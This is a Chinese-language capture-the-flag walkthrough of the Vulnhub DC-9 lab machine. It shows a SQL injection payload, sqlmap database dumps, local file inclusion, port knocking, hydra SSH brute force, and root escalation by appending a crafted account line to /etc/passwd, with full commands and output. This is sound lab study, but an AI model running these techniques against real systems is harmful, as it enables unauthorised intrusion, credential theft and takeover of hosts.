Vulnhub-DC-9

靶机IP:192.168.20.144
kaliIP:192.168.20.128
网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP)

信息收集

nmap扫描一下端口及版本号

dirsearch扫目录

最后去前端界面观察发现也没什么隐藏路径。
观察功能，search引起注意，SQL注入测试
当输入111' or 1=1#时，

会把所有信息全部搜索出来，判断此处存在SQL注入

漏洞利用

之后丢到sqlmap上去跑
因为是post方式注入，所以用burp抓包，存个文件，用-d参数引用。

sqlmap -r sql.txt -p search --dbs

[15:34:06] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

--current-db得到当前数据库是Staff，看着user比较敏感，先去user库看下（其实user库信息不能利用）
sqlmap -r sql.txt -p search --tables -D users

Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+

sqlmap -r sql.txt -p search --columns -T UserDetails -D users

Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column    | Type            |
+-----------+-----------------+
| firstname | varchar(30)     |
| id        | int(6) unsigned |
| lastname  | varchar(30)     |
| password  | varchar(20)     |
| reg_date  | timestamp       |
| username  | varchar(30)     |
+-----------+-----------------+

sqlmap -r sql.txt -p search --dump -T UserDetails -D users

Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

之后去网站登录，结果发现拿到的账号密码都无法登录。
那么就去Staff库看看吧，sqlmap的命令就不再贴了。
拿到信息

Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+

Password是MD5，解密得到transorbital1

之后登入网站，寻找利用点
这儿可能存在文件包含漏洞在Vulnhub-DC-5中也涉及到了这个漏洞，在DC-5解释了漏洞原因。

也是不知道include的参数，要用字典猜测。
这里用DC-5的LFI字典，是fuzz不出来的。
为什么，看下DC-5的源码

DC-的源码

DC-8include参数组成是，directory/+$file（directory/目录是不存在的）
DC-5include参数就是传入的file值，直接访问绝对路径就可以了
而在DC-8总我们需要…/跳到根目录再去访问，所以这里换一个字典
下面是fuzz的结果。

发现和DC-的参数都是file
看下passwd

发现了我们在user数据库中拿到的用户名（刚才没有尝试SSH连接，接下来试试）
用爆破，发现ssh连接不上（在信息收集时就能发现ssh22端口没有开）
因为靶机开启了knock：端口敲门服务
根据knock配置文件路径看下敲门的顺序7469，8475，9842

之后在kali下载knock，（也可以用nmap敲门for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 192.168.20.144; done）

┌──(root㉿kali)-[/home/kali]
└─# knock 192.168.20.144 7469 8475 9842

提权

敲门之后查看ssh已经开启

┌──(root㉿kali)-[/home/kali]
└─# nmap -sV -A -p 22 192.168.20.144
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-14 22:42 CST
Nmap scan report for 192.168.20.144
Host is up (0.00043s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2b3387432740bc516dc13decb9b8ac3 (RSA)
|   256 065c93871554686b889155cff89ace40 (ECDSA)
|_  256 e42c88da8863268c93d5f7632ba3ebab (ED25519)
MAC Address: 00:0C:29:65:6B:4B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

之后用hydra爆破ssh,发现三个账号可用

┌──(root㉿kali)-[/home/kali/Desktop/DC-9]
└─# hydra -L user.txt -P pass.txt ssh://192.168.20.144
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-14 22:46:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 324 login tries (l:18/p:18), ~21 tries per task
[DATA] attacking ssh://192.168.20.144:22/
[22][ssh] host: 192.168.20.144   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.20.144   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.20.144   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-14 22:47:32

ssh连接这三个账号看看有啥信息，最后在janitor的路径下发现了几个密码

janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

我们丢到hydra中再跑一遍，又拿到了一组用户密码

[22][ssh] host: 192.168.20.144   login: fredf   password: B4-Tru3-001

看下能提权的东西，发现可root执行/opt/devstuff/dist/test/test

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser fredf may run the following commands on dc-9:(root) NOPASSWD: /opt/devstuff/dist/test/test

执行下看看

fredf@dc-9:~$ /opt/devstuff/dist/test/test
Usage: python test.py read append

给了使用说明我们去找下test.py

find / -name test.py > pass.txt
fredf@dc-9:/tmp$ cat pass.txt 
/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py

查看test.py内容

fredf@dc-9:/tmp$ cat /opt/devstuff/test.py
#!/usr/bin/pythonimport sysif len (sys.argv) != 3 :print ("Usage: python test.py read append")sys.exit (1)else :f = open(sys.argv[1], "r")output = (f.read())f = open(sys.argv[2], "a")f.write(output)f.close()

意思是打开文件并追加到XX最后
这样可以想到在passwd或者sudoers中追加权限信息进行提权
下面是在passwd中添加
先用openssl生成密码的哈希是，盐值为salt

fredf@dc-9:/tmp# openssl passwd -1 -salt haha 123456
$1$haha$T7nt1ThchynsrEviA0KLT0
fredf@dc-9:/tmp$ echo 'y06z:$1$haha$T7nt1ThchynsrEviA0KLT0:0:0::/root:/bin/bash' > a
fredf@dc-9:/tmp$ vi a
fredf@dc-9:/tmp$ sudo /opt/devstuff/dist/test/test a /etc/passwd
fredf@dc-9:/tmp$ su y06z
Password: 
root@dc-9:/tmp# find / -name *flag*
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/sda/hctx0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/var/lib/mysql/debian-10.3.flag
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/ss_flags.ph
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/waitflags.ph
/usr/bin/dpkg-buildflags
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/x86_64-linux-gnu/bits/ss_flags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/linux/tty_flags.h
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/nl/man1/dpkg-buildflags.1.gz
/usr/share/man/de/man1/dpkg-buildflags.1.gz
/usr/share/man/man1/dpkg-buildflags.1.gz
/usr/share/man/fr/man1/dpkg-buildflags.1.gz
/usr/share/man/man2/ioctl_iflags.2.gz
/usr/share/dpkg/buildflags.mk
root@dc-9:/tmp# cat /root/theflag.txt███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝Congratulations - you have done well to get to this point.Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.I also want to send out a big thank you to the various members of @m0tl3ycr3w .They are an inspirational bunch of fellows.Sure, they might smell a bit, but...just kidding.  :-)Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.So long, and thanks for all the fish.